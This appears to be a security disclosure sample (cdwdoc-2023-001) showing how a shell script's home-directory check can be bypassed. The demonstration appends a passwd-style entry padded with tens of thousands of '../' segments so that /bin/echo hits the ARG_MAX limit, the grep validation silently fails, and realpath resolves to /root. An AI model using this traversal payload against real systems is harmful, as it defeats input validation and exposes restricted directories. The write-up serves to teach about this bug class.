a sample of [cdwdoc-2023-001], malicious data from a text file
this sample is for modern Linux (kernel 2.6.23 or later, and /usr/bin/realpath is part of GNU coreutils or is a symlink to modern busybox with glibc)
#!/bin/sh
# written by cleemy desu wayo / see [cdwdoc-2023-001] / Licensed under CC0 1.0
user_home_dir=$(grep "^$1"':' < passwd.txt | head -1 | awk -F: '{print $6}')
[ "dummy$user_home_dir" = "dummy" ] && exit 1
# too optimistic
if /bin/echo "dummy$user_home_dir" | grep '[^a-z0-9/]' > /dev/null ; then
echo "error: invalid dir" >&2
exit 1
fi
realpath "$user_home_dir"
exit 0-
This code extracts a string from passwd.txt in the current directory and finally passes it to
realpath. before passing it torealpath, the string is checked.In the example that will be shown, it is assumed that
/home/user1exists.passwd.txtis a bit like/etc/passwdand is intended for data where the first column is the user name and the sixth column is the directory.$ echo 'user1:::::/home/user1:/bin/sh' > passwd.txt $ ./cdwdoc-2023-001_sample_dir3.sh user1 /home/user1So what happens if the sixth column is something like "/home/user1/../../root"?
$ echo 'user2:::::/home/user1/../../root:/bin/sh' >> passwd.txt $ ./cdwdoc-2023-001_sample_dir3.sh user2 error: invalid dirIt is properly recognized as fraudulent. So what happens when we do this?
$ printf 'user3:::::/home/user1/' >> passwd.txt $ yes '../' | head -43685 | tr -d '\n' >> passwd.txt $ printf 'root:/bin/sh\n' >> passwd.txt $ ./cdwdoc-2023-001_sample_dir3.sh user3 ./cdwdoc-2023-001_sample_dir3.sh: 9: /bin/echo: Argument list too long /rootWe got a "/root" output.
When trying
cdwdoc-2023-001_sample_dir.shas a stand-alone script from a terminal, the user trying it is themselves affected by the ARG_MAX limit.In the case of
cdwdoc-2023-001_sample_dir3.sh, the attackers themselves may not be affected by the ARG_MAX limit.cdwdoc-2023-001_sample_dir.shis here: https://gitlab.com/-/snippets/2487375